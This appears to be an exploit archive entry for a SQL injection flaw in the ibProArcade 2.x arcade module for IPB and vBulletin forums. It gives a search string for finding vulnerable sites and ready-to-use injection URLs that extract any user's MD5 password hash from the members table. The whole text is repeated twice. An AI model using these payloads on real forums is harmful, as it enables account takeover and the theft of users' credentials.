[ibProArcade 2_x module (vBulletin-IPB) Remote SQL Injection Exploit]
# Rankings for (name) will state the md5 hash for the user /str0ke
# ibProArcade 2.x
# Bug search : "index.php?act=Arcade"
IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]
vBulletin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]
# Rankings for (name) will state the md5 hash for the user /str0ke
# ibProArcade 2.x
# Bug search : "index.php?act=Arcade"
IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]
vBulletin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]